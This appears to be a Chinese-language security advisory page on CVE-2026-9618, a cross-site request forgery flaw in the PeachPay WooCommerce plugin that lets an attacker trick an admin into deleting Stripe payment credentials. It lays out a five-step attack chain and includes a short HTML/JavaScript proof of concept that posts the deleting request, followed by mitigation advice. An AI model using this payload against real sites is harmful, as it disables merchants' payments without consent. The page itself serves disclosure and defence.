IPBUF安全漏洞报告
English
CVE-2026-9618 CVSS 4.3 中危

CVE-2026-9618 PeachPay插件CSRF漏洞致支付凭证删除

披露日期: 2026-05-28

漏洞信息

漏洞编号
CVE-2026-9618
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
PeachPay — Payments & Express Checkout for WooCommerce

相关标签

CSRFWordPressWooCommercePeachPayStripeCWE-352

漏洞概述

WordPress插件PeachPay在1.120.46及之前版本中存在CSRF漏洞。由于缺少nonce验证,未认证攻击者可诱导管理员点击恶意链接,从而永久删除Stripe支付凭证(包括密钥和配置),导致商店支付功能瘫痪。

技术细节

该漏洞源于插件中的`peachpay_stripe_handle_admin_actions`函数缺少或未正确执行nonce验证。Nonce是WordPress中用于防止CSRF攻击的关键安全令牌。攻击者可构造包含恶意请求的HTML页面(如隐藏的iframe或自动提交的表单),诱导已登录的管理员访问。当管理员访问时,浏览器会自动携带管理员Cookie向WordPress后台发送请求。由于服务端未验证nonce,该请求被误认为是合法的,从而执行删除Stripe相关敏感配置的操作。尽管无需认证(PR:N),但仍需用户交互(UI:R)。

攻击链分析

STEP 1
1. 侦察
攻击者确认目标站点使用了存在漏洞的PeachPay插件版本。
STEP 2
2. 构造攻击载荷
攻击者创建包含恶意HTTP请求的网页,请求目标为删除Stripe凭证的接口。
STEP 3
3. 社会工程学诱导
攻击者将恶意链接发送给目标WordPress站点的管理员,诱使其点击访问。
STEP 4
4. 执行攻击
管理员在已登录状态下访问链接,浏览器自动发送包含会话凭证的请求至服务器。
STEP 5
5. 达成破坏
服务器因缺少nonce验证而执行请求,永久删除Stripe支付配置,禁用支付功能。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- Proof of Concept for CVE-2026-9618 --> <!-- This PoC demonstrates the deletion of Stripe credentials via CSRF --> <!-- The victim must be an authenticated admin --> <html> <body> <script> // Attempt to delete Stripe credentials var xhr = new XMLHttpRequest(); xhr.open("POST", "https://example.com/wp-admin/admin-post.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // Action targeting the vulnerable function xhr.send("action=peachpay_stripe_handle_admin_actions&delete_stripe_config=1"); </script> </body> </html>

影响范围

PeachPay — Payments & Express Checkout for WooCommerce <= 1.120.46

防御指南

临时缓解措施
在未升级插件前,建议管理员不要点击不明来源的链接,并在完成管理工作后立即退出登录。可考虑部署WAF规则以拦截针对该特定函数的非正常请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表